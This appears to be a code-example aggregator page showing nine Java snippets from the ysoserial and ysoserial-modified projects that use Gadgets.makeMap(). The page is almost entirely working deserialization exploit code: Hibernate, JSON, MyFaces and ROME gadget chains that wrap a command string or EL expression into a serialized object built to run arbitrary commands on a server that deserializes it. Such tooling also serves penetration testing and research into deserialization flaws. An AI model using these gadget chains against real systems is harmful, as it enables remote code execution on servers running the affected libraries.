Java Code Examples for ysoserial.payloads.util.Gadgets#makeMap()

The following examples show how to use ysoserial.payloads.util.Gadgets#makeMap() . You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source File: Hibernate1.java    From ysoserial-modified with MIT License 6 votes vote down vote up 
static Object makeCaller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    Reflections.setFieldValue(t, "componentTuplizer", tup);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {
        t
    });

    TypedValue v1 = new TypedValue(t, null);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    TypedValue v2 = new TypedValue(t, null);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
}
Example 2
Source File: Hibernate1.java    From ysoserial with MIT License 6 votes vote down vote up 
static Object makeHibernate45Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    Reflections.setFieldValue(t, "componentTuplizer", tup);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {
        t
    });

    TypedValue v1 = new TypedValue(t, null);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    TypedValue v2 = new TypedValue(t, null);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
}
Example 3
Source File: JSON1.java    From ysoserial-modified with MIT License 5 votes vote down vote up 
/**
 * Will call all getter methods on payload that are defined in the given interfaces
 */
public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
    CompositeType rt = new CompositeType("a", "b", new String[] {
        "a"
    }, new String[] {
        "a"
    }, new OpenType[] {
        javax.management.openmbean.SimpleType.INTEGER
    });
    TabularType tt = new TabularType("a", "b", rt, new String[] {
        "a"
    });
    TabularDataSupport t1 = new TabularDataSupport(tt);
    TabularDataSupport t2 = new TabularDataSupport(tt);

    // we need to make payload implement composite data
    // it's very likely that there are other proxy impls that could be used
    AdvisedSupport as = new AdvisedSupport();
    as.setTarget(payload);
    InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections
            .getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as);
    InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
    CompositeInvocationHandlerImpl invocationHandler = new CompositeInvocationHandlerImpl();
    invocationHandler.addInvocationHandler(CompositeData.class, cdsInvocationHandler);
    invocationHandler.setDefaultHandler(delegateInvocationHandler);
    final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);

    JSONObject jo = new JSONObject();
    Map m = new HashMap();
    m.put("t", cdsProxy);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(t1, "dataMap", jo);
    Reflections.setFieldValue(t2, "dataMap", jo);
    return Gadgets.makeMap(t1, t2);
}
Example 4
Source File: Myfaces1.java    From ysoserial-modified with MIT License 5 votes vote down vote up 
public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception  {
    FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
    ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
    Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
    ExpressionFactory expressionFactory = ExpressionFactory.newInstance();
    
    ValueExpression ve1 = expressionFactory.createValueExpression(elContext, expr, Object.class);
    ValueExpressionMethodExpression e = new ValueExpressionMethodExpression(ve1);
    ValueExpression ve2 = expressionFactory.createValueExpression(elContext, "${true}", Object.class);
    ValueExpressionMethodExpression e2 = new ValueExpressionMethodExpression(ve2);

    return Gadgets.makeMap(e2, e);
}
Example 5
Source File: JSON1.java    From ysoserial with MIT License 5 votes vote down vote up 
/**
 * Will call all getter methods on payload that are defined in the given interfaces
 */
public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
    CompositeType rt = new CompositeType("a", "b", new String[] {
        "a"
    }, new String[] {
        "a"
    }, new OpenType[] {
        javax.management.openmbean.SimpleType.INTEGER
    });
    TabularType tt = new TabularType("a", "b", rt, new String[] {
        "a"
    });
    TabularDataSupport t1 = new TabularDataSupport(tt);
    TabularDataSupport t2 = new TabularDataSupport(tt);

    // we need to make payload implement composite data
    // it's very likely that there are other proxy impls that could be used
    AdvisedSupport as = new AdvisedSupport();
    as.setTarget(payload);
    InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections.newInstance("org.springframework.aop.framework.JdkDynamicAopProxy", as);
    InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
    InvocationHandler invocationHandler = (InvocationHandler) Reflections.newInstance("com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl");
    ((Map) Reflections.getFieldValue(invocationHandler, "classToInvocationHandler")).put(CompositeData.class, cdsInvocationHandler);
    Reflections.setFieldValue(invocationHandler, "defaultHandler", delegateInvocationHandler);
    final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);

    JSONObject jo = new JSONObject();
    Map m = new HashMap();
    m.put("t", cdsProxy);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(t1, "dataMap", jo);
    Reflections.setFieldValue(t2, "dataMap", jo);
    return Gadgets.makeMap(t1, t2);
}
Example 6
Source File: Myfaces1.java    From ysoserial with MIT License 5 votes vote down vote up 
public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception  {
    FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
    ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
    Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
    ExpressionFactory expressionFactory = ExpressionFactory.newInstance();

    ValueExpression ve1 = expressionFactory.createValueExpression(elContext, expr, Object.class);
    ValueExpressionMethodExpression e = new ValueExpressionMethodExpression(ve1);
    ValueExpression ve2 = expressionFactory.createValueExpression(elContext, "${true}", Object.class);
    ValueExpressionMethodExpression e2 = new ValueExpressionMethodExpression(ve2);

    return Gadgets.makeMap(e2, e);
}
Example 7
Source File: Hibernate1.java    From ysoserial with MIT License 5 votes vote down vote up 
static Object makeHibernate3Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    // Load at runtime to avoid dependency conflicts
    Class entityEntityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping");
    Class entityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.EntityModeToTuplizerMapping");
    Class typedValueClass = Class.forName("org.hibernate.engine.TypedValue");

    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
    Reflections.getField(AbstractComponentTuplizer.class, "propertySpan").set(tup, 1);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    HashMap hm = new HashMap();
    hm.put(EntityMode.POJO, tup);
    Object emtm = Reflections.createWithConstructor(entityEntityModeToTuplizerMappingClass, entityModeToTuplizerMappingClass, new Class[]{ Map.class }, new Object[]{ hm });
    Reflections.setFieldValue(t, "tuplizerMapping", emtm);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {
        t
    });

    Constructor<?> typedValueConstructor = typedValueClass.getDeclaredConstructor(Type.class, Object.class, EntityMode.class);
    Object v1 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    Object v2 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
}
Example 8
Source File: ROME.java    From ysoserial-modified with MIT License 4 votes vote down vote up 
public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
    Object o = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
    ObjectBean delegate = new ObjectBean(Templates.class, o);
    ObjectBean root  = new ObjectBean(ObjectBean.class, delegate);
    return Gadgets.makeMap(root, root);
}
Example 9
Source File: ROME.java    From ysoserial with MIT License 4 votes vote down vote up 
public Object getObject ( String command ) throws Exception {
    Object o = Gadgets.createTemplatesImpl(command);
    ObjectBean delegate = new ObjectBean(Templates.class, o);
    ObjectBean root  = new ObjectBean(ObjectBean.class, delegate);
    return Gadgets.makeMap(root, root);
}